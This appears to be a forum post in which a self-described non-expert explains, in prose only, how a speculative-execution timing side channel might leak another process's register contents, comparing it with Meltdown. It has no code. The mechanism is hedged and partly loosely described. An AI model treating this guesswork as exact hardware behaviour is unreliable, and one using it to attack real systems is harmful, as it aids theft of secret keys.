I think these flaws work approximately like this: Process 1 ensures that memory location X is in the cache (by accessing it), while memory location Y is not in the cache (by accessing enough other locations that location Y gets flushed out); then process 1 yields the processor to other processes.
The scheduler runs process 2 for a while. Eventually, process 1 is scheduled for execution again.
Then, when process 1 gets the processor back, some registers contain data that belong to process 2. If process 1 uses those data in any way, there is a trap, and the registers are loaded with the correct values for process 1 before the instructions accessing these registers finish execution.
However, process 1 now executes a program fragment consisting of two branches, one taken and one not taken. The processor executes both branches before it learns which branch is the correct one in the program logic. That is, the processor initiates execution of instructions from both branches before it knows the result of the test that decides what branch to take.
The branch not taken extracts a bit 'b' from a register that contains data belonging to the previous process, and executes a memory fetch from location "if b then X, else Y".
Had this branch actually been the one taken in the program logic, the fetch would have forced a trap. However, the trap is delayed until the processor knows if the trap is needed. Since that branch is not taken, the results of the speculative execution are discarded, and all registers touched by that branch are automatically restored to their correct values as per the execution of the second branch, and no trap is generated. The process learns nothing about bit b, or the contents of memory location X or Y. No trap is needed. Not generating the trap saves a few cycles.
However, process 1 may measure how long time it took to get past the branching instruction. This reveals if X or Y was accessed, and thereby reveals the value of bit b. That is the leak.
In the meltdown bug, the exploit could load bit "b" from a memory location that was not part of the process' address space but belonged to the kernel memory or to some other process, and the exploit could control what memory location to draw the bit from. Since many operating systems have all physical memory mapped in kernel memory space, the exploit could systematically retrieve every bit in physical memory.
To exploit the present bug, the exploit would probably have to engage a victim program, e.g. a web server running in the same processor, by creating network connections. It would have to do so repeatedly and hope that a context switch happens while the web server is doing cryptographic operations. I don't know if there are any clear ways to control this with sufficient precision to actually collect bits from a secret key. How can the attacker know what the contents of the registers really are at the time of the context switch? The attacker would perhaps only get a single bit from each authentication attempt. If each authentication attempt uses a different nonce, many of the register values will be uncorrelated from one authentication attempt to another. But of course, it is also possible that a register could contain a portion of the secret key. Having access to the relevant libraries, an attacker may be able to determine at what point the secret key will be loaded into what registers. Since I have no experience creating exploits, I have no idea if it is possible to force a context switch in a different process at exactly the opportune moment. If so, it is probably a matter of patience to get more an more information about the secret keys.